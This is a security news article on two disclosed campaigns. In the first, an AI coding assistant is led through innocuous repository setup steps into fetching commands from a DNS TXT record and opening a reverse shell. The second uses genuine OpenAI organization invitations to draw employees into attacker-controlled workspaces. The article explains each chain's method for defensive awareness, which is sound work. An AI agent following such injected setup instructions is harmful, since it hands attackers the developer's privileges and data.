AI As A New Age Attack Vector
Artificial intelligence has become deeply embedded in enterprise software development and business workflows, transforming how employees write code, analyze data, and automate repetitive tasks. At the same time, threat actors have shifted from attacking underlying AI models to exploiting the trust organizations place in AI-assisted workflows.
Two recently disclosed campaigns illustrate this shift. One, discovered by 0din, abuses AI coding agents to execute attacker-controlled commands without any malicious code residing in a GitHub repository. The other, discovered by Push Security, weaponizes legitimate OpenAI organization invitations to lure employees into attacker-controlled workspaces where sensitive corporate information could be harvested.
The GitHub attack shows the risks associated with agentic coding assistants. Researchers demonstrated that a repository could appear entirely benign while still leading an AI coding assistant through a chain of trusted actions that ultimately executed a reverse shell. Rather than exploiting a software vulnerability, the attacker exploited the assistant's tendency to automatically resolve setup errors.
The proof of concept relied on three seemingly harmless components: a repository with ordinary setup instructions, a Python package that instructed users to initialize the application before use, and an initialization script that retrieved a configuration value from a DNS TXT record. Individually, none appeared suspicious. Together, they created an execution chain that ultimately retrieved and executed attacker-controlled commands at runtime.
Because the payload lived only in a DNS record, it never appeared in the repository itself. As a result, static code analysis, repository reviews, and conventional malware scanning had little chance of detecting it. The AI assistant faithfully followed instructions, interpreted an initialization error as a routine configuration issue, executed the documented fix, and unknowingly granted the attacker an interactive shell with the developer's privileges.
The broader lesson extends beyond a single coding assistant. Agentic AI systems increasingly have permission to execute shell commands, access local files, retrieve secrets, and interact with cloud services. Those capabilities dramatically expand productivity, but they also expand the consequences of misplaced trust.
Key characteristics of AI-mediated repository attacks include:
- Exploiting trusted workflows instead of software vulnerabilities.
- Delivering malicious payloads dynamically rather than storing them in source code.
- Using indirect prompt injection through documentation, error messages, and runtime dependencies.
- Abusing AI error recovery and automation to execute attacker instructions.
Researchers concluded,
The attack splits its components across three systems that are never examined together: the repository, the DNS infrastructure, and the developer's trust in their AI agent. Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None of the three looks malicious in isolation...To defend against this, agents need to surface what a setup command will actually run, including the contents of any script it invokes and anything that script fetches at runtime, not just the command itself. Developers should treat setup instructions and scripts in unfamiliar repositories as untrusted code, regardless of what their AI tool recommends.
The Poisoned Tenant Attack
The second campaign aimed to build trust from a different direction. Rather than manipulating an AI coding assistant, attackers created fraudulent OpenAI organizations that impersonated legitimate cybersecurity companies. Invitations originated from OpenAI's legitimate notification infrastructure, passed authentication checks, and appeared almost identical to genuine enterprise invitations.
Researchers who accepted an invitation found themselves inside an attacker-controlled tenant bearing the company's name. The attacker had even configured billing information and assigned administrative privileges to invited users to reinforce the illusion of legitimacy.
The workspace itself contained little content, suggesting the objective was not immediate compromise but persuading employees to conduct legitimate work inside the fraudulent environment. The question, then, is why go to all the effort? To simply harvest data without any friction.
Researchers noted,
The stolen credit card removes a friction point that might otherwise tip someone off: if there were no billing set up and employees hit a paywall when trying to use the API, they'd start asking questions internally about who created the org. A pre-funded account removes friction and the chance to discover that something is up.
If successful, employees could unknowingly submit source code, customer information, internal documents, research findings, strategic plans, or other confidential prompts directly into infrastructure controlled by the attacker. Unlike traditional phishing, the emails themselves were genuine platform notifications, making them far more difficult for secure email gateways and users to distinguish from legitimate business communications.
This technique reflects a wider trend in which attackers abuse trusted SaaS platform features rather than spoof them. Invitation systems, collaboration spaces, shared AI projects, and notification services increasingly give adversaries authenticated delivery channels that bypass conventional security assumptions.
For defenders, these incidents demonstrate that AI platforms should now be regarded as privileged enterprise infrastructure.
Organizations should:
- Train employees to verify unexpected SaaS organization invitations through internal channels.
- Monitor SaaS organization memberships and shadow AI usage.
- Treat AI-generated setup instructions and unfamiliar repository initialization scripts as untrusted.
- Increase visibility into AI agent actions, including runtime downloads and indirect command execution.
- Encourage vendors to strengthen identity verification and invitation controls.
Taken together, these attacks reveal a clear shift. Attackers no longer need sophisticated exploits when they can manipulate trusted AI workflows and legitimate cloud services. The attack surface has expanded from vulnerable software to trusted decision-making. Security strategies must therefore evolve beyond detecting malicious files and emails toward validating the trust relationships that increasingly govern AI-assisted work.
Organizations that combine governance, visibility, user awareness, and layered controls around AI platforms will be far better positioned to benefit from AI innovation without exposing themselves to a rapidly growing class of AI-enabled attacks.
Share:
Facebook
X.com
LinkedIn
Copy Link
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
DonatePCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
Donate
▼ Show Discussion